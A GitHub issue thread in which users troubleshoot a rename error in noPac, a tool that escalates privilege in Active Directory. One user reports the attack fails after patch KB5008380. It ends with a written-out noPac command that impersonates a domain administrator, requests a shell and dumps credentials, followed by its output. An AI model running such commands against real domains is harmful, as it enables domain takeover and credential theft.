[-] Cannot rename the machine account , Reason 00000523: SysErr: DSID-031A1260, problem 22 (Invalid argument), data 0 #18
Comments
|
I came across the same issue. Did you find a solution? I'm thinking that it is patched. |
|
How about user rights? |
|
Default domain user |
|
What do you mean ? |
|
just domain user |
|
I have same issue. Normal domain user and --impersonate is Domain Admin |
|
I figure it out the issue. The user I was using didn't have the permission to create computer object. |
|
with the default MachineAccountQuota present ? |
|
Computer object created but kerberos sessionerror kdc_err_tgt_revoked(tgt has been revoked). After Server update with kb5008380 Patch Nopac not able to work. After this patch applied, even Domain admin Also gave this error. I have tried Domain Admin User and password Instead of normal user. (with the default MachineAccountQuota 10) |
oot@US-UBNT:~/Github/noPac# sudo python3 noPac.py VB.local/user:'password2' -dc-ip 192.168.0.10 -shell --impersonate administrateur -use-ldap -dump
[] Current ms-DS-MachineAccountQuota = 10
[] Selected Target srv-dc.cns.local
[] will try to impersonate administrateur
[] Adding Computer Account "WIN-OAUXQPSRDGR$"
[] MachineAccount "WIN-OAUXQPSRDGR$" password = RqkVgjy(Y5d
[] Successfully added machine account WIN-OAUXQPSRDGR$ with password RqkVgjy(Y5d.
[*] WIN-OAUXQPSRDGR$ object = CN=WIN-OAUXQPSRDGR,CN=Computers,DC=CNS,DC=LOCAL
[-] Cannot rename the machine account , Reason 00000523: SysErr: DSID-031A1260, problem 22 (Invalid argument), data 0
[*] Attempting to del a computer with the name: WIN-OAUXQPSRDGR$
[-] Delete computer WIN-OAUXQPSRDGR$ Failed! Maybe the current user does not have permission.
The text was updated successfully, but these errors were encountered: